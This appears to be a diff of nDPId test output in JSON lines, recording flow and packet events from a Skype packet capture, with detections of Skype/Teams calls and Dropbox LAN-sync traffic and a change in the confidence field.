00864{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":568,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1431970648368,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":351,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":351,"pkt_l4_len":317,"thread_ts_msec":1431970648368,"pkt":"AQBef\/\/6oPPBbTu2CABFAAFRBH8AAAQR\/3zAqAD+7\/\/\/+gQBB2wBPQhzTk9USUZZICogSFRUUC8xLjENCkhPU1Q6IDIzOS4yNTUuMjU1LjI1MDoxOTAwDQpDQUNIRS1DT05UUk9MOiBtYXgtYWdlPTEwMA0KTE9DQVRJT046IGh0dHA6Ly8xOTIuMTY4LjAuMjU0OjE5MDAvaWdkLnhtbA0KTlQ6IHV1aWQ6dXBucC1JbnRlcm5ldEdhdGV3YXlEZXZpY2UtMTkyMTY4MDI1NDc4OTAwMDAxDQpOVFM6IHNzZHA6YWxpdmUNClNFUlZFUjogVFAtTElOSyBXaXJlbGVzcyBOIE5hbm8gUm91dGVyIFdSNzAyTiwgVVBuUC8xLjANClVTTjogdXVpZDp1cG5wLUludGVybmV0R2F0ZXdheURldmljZS0xOTIxNjgwMjU0Nzg5MDAwMDENCg0K"} 
00936{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":569,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":1431970648368,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":405,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":405,"pkt_l4_len":371,"thread_ts_msec":1431970648368,"pkt":"AQBef\/\/6oPPBbTu2CABFAAGHBIAAAAQR\/0XAqAD+7\/\/\/+gQBB2wBc+ePTk9USUZZICogSFRUUC8xLjENCkhPU1Q6IDIzOS4yNTUuMjU1LjI1MDoxOTAwDQpDQUNIRS1DT05UUk9MOiBtYXgtYWdlPTEwMA0KTE9DQVRJT046IGh0dHA6Ly8xOTIuMTY4LjAuMjU0OjE5MDAvaWdkLnhtbA0KTlQ6IHVybjpzY2hlbWFzLXVwbnAtb3JnOmRldmljZTpJbnRlcm5ldEdhdGV3YXlEZXZpY2U6MQ0KTlRTOiBzc2RwOmFsaXZlDQpTRVJWRVI6IFRQLUxJTksgV2lyZWxlc3MgTiBOYW5vIFJvdXRlciBXUjcwMk4sIFVQblAvMS4wDQpVU046IHV1aWQ6dXBucC1JbnRlcm5ldEdhdGV3YXlEZXZpY2UtMTkyMTY4MDI1NDc4OTAwMDAxOjp1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCg0K"} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":589,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648822,"flow_last_seen":1431970648822,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970648822,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.32","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":589,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1431970648822,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1431970648822,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/tTsAAEAR41DAqAEiQTffIDLdnFYAK5o2etcCQsTVfNgeznDqGm3ssKnJOluDwQd072c+I4wlse7Ecr8="} -00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":589,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648822,"flow_last_seen":1431970648822,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970648822,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.32","src_port":13021,"dst_port":40022,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":589,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648822,"flow_last_seen":1431970648822,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970648822,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.32","src_port":13021,"dst_port":40022,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":590,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648822,"flow_last_seen":1431970648822,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970648822,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.33","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":590,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1431970648822,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1431970648822,"pkt":"0NQSxnP1PBXCt3IOCABFAAA+1vAAAEARJ\/bAqAEib91KITLdnEsAKklketkCS\/KCvZwmcOx3xDmHrpkfhUG8CXubM92mElOOFhZFlQ=="} -00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":590,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648822,"flow_last_seen":1431970648822,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970648822,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.33","src_port":13021,"dst_port":40011,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":590,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648822,"flow_last_seen":1431970648822,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970648822,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.33","src_port":13021,"dst_port":40011,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":591,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648822,"flow_last_seen":1431970648822,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970648822,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.145","src_port":13021,"dst_port":40008,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":591,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1431970648822,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1431970648822,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6md0AAEARSUPAqAEinTc4kTLdnEgAJsmIetsCpJOMytcJAiTHtz9O4hYGu7tAbRVxbii4hHFE"} 
-00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":591,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648822,"flow_last_seen":1431970648822,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970648822,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.145","src_port":13021,"dst_port":40008,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":591,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648822,"flow_last_seen":1431970648822,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970648822,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.145","src_port":13021,"dst_port":40008,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":592,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648822,"flow_last_seen":1431970648822,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970648822,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.13","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":592,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1431970648822,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":1431970648822,"pkt":"0NQSxnP1PBXCt3IOCABFAAA5n+IAAEAR+MLAqAEiQTffDTLdnEkAJdiCet0C1RhCM\/VIp+W5EaRfz2WprIWREBw71gUfrFc="} -00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":592,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648822,"flow_last_seen":1431970648822,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970648822,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.13","src_port":13021,"dst_port":40009,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":592,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648822,"flow_last_seen":1431970648822,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970648822,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.13","src_port":13021,"dst_port":40009,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":593,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648822,"flow_last_seen":1431970648822,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431970648822,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.19","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":593,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1431970648822,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1431970648822,"pkt":"0NQSxnP1PBXCt3IOCABFAAA29EUAAEAR81vAqAEinTg0EzLdnFQAIrQSet8CIfzcSNY9VVu6zPT0+wzX1iqsIu28Tro="} -00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":593,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648822,"flow_last_seen":1431970648822,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431970648822,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.19","src_port":13021,"dst_port":40020,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":593,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648822,"flow_last_seen":1431970648822,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431970648822,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.19","src_port":13021,"dst_port":40020,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":594,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648880,"flow_last_seen":1431970648880,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431970648880,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01132{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":594,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1431970648880,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":544,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":544,"pkt_l4_len":510,"thread_ts_msec":1431970648880,"pkt":"\/\/\/\/\/\/\/\/PBXCt3IOCABFAAISCYEAAEARrZDAqAEi\/\/\/\/\/0RcRFwB\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"} 
-00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":594,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648880,"flow_last_seen":1431970648880,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431970648880,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":594,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648880,"flow_last_seen":1431970648880,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431970648880,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":595,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648880,"flow_last_seen":1431970648880,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431970648880,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01128{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":595,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1431970648880,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":544,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":544,"pkt_l4_len":510,"thread_ts_msec":1431970648880,"pkt":"\/\/\/\/\/\/\/\/PBXCt3IOCABFAAIStlkAAEARPhDAqAEiwKgB\/0RcRFwB\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"} -00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":595,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648880,"flow_last_seen":1431970648880,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431970648880,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":595,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648880,"flow_last_seen":1431970648880,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431970648880,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 
00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":596,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648979,"flow_last_seen":1431970648979,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431970648979,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01132{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":596,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1431970648979,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":544,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":544,"pkt_l4_len":510,"thread_ts_msec":1431970648979,"pkt":"\/\/\/\/\/\/\/\/xCwDBkn+CABFAAIS99EAAEARvwXAqAFc\/\/\/\/\/0RcRFwB\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"} -00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":596,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648979,"flow_last_seen":1431970648979,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431970648979,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 
+00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":596,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648979,"flow_last_seen":1431970648979,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431970648979,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":597,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648982,"flow_last_seen":1431970648982,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431970648982,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01128{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":597,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1431970648982,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":544,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":544,"pkt_l4_len":510,"thread_ts_msec":1431970648982,"pkt":"\/\/\/\/\/\/\/\/xCwDBkn+CABFAAISMXYAAEARwrnAqAFcwKgB\/0RcRFwB\/jyueyJob3N0X2ludCI6IDMzNzUzNTk1OTMsICJ2ZXJzaW9uIjogWzEsIDhdLCAiZGlzcGxheW5hbWUiOiAiIiwgInBvcnQiOiAxNzUwMCwgIm5hbWVzcGFjZXMiOiBbMTQ4MTkzMzcsIDE3NjA5OTYzLCAyMDY0OTM0OSwgMjg1MjE2MDcsIDU4MzQ0OTk2LCA2MDU5NDk4MywgNjQ0MzYwOTksIDk2ODUzMjI0LCA5OTQ2OTc3MywgMTAxMDQ3OTk2LCAxMDgxNTkxMDIsIDEyNTU0MDU2NiwgMTc2OTY0MzA3LCAyNDM2ODI5ODYsIDI0NzkyNTA4NSwgMjYwNDY1MjYxLCAyNzA0MDQ3NDIsIDI4Mzg2MTQ1NywgNDI0NTQwMTk3LCA0NDgzOTczOTMsIDQ1MTQ3MjY1OCwgNTExNzA2NjQyLCA1NjgzOTU4MzMsIDU5NDI0Njk1NCwgNTk4MDYxMDY2LCA2MTU5ODMzNzksIDcyMDA1ODM2MSwgNzM1MDUxODMwLCA3MzYzNDE1MjgsIDc0MTI1NTYxMywgNzc2MDg3MjQ3LCA3ODA4NzA1ODEsIDc4Mjk4MTk0OSwgNzg1MjY2MTc3LCA4MTg3NTI3MTAsIDg1NTY4MjM5MCwgODg0MTIwMTMyLCA5MDg5MTQ4NjhdfQ=="} -00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":597,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648982,"flow_last_seen":1431970648982,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431970648982,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 
+00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":597,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648982,"flow_last_seen":1431970648982,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431970648982,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":601,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970649777,"flow_last_seen":1431970649777,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970649777,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.147","src_port":51234,"dst_port":40001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":601,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1431970649777,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970649777,"pkt":"0NQSxnP1PBXCt3IOCABFAABADS1AAEAG4vXAqAEinTfrk8ginEEPp71\/AAAAALAC\/\/+7IQAAAgQFtAEDAwUBAQgKPjHBiQAAAAAEAgAA"} 
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":602,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970649777,"flow_last_seen":1431970649777,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970649777,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.45","src_port":51235,"dst_port":40009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
